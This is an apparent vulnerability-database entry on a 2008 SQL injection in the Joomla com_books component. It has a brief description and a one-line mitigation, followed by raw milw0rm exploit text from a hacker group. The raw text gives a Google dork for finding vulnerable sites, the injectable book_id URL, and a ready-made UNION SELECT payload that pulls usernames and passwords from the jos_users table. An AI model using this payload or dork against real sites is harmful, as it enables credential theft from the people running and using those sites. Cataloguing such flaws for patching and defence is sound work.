Joomla com_books(book_id) SQL injection Vulnerability

vendor:

com_books

by:

boom3rang

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_books

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla com_books(book_id) SQL injection Vulnerability

A vulnerability in the Joomla com_books component allows an attacker to inject arbitrary SQL commands via the book_id parameter. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database, such as usernames and passwords. The vulnerability is caused by insufficient sanitization of user-supplied input.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

#######################################################
Joomla com_books(book_id) SQL injection Vulnerability
#######################################################


###################################################
#[~] Author :  boom3rang 
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.

#[!] Module_Name:  com_books
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_books"
##################################################

#[~] Example:  
http://localhost/Path/index.php?option=com_books&task=book_details&book_id=[exploit]


#[~]Exploit:  
-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-11-11]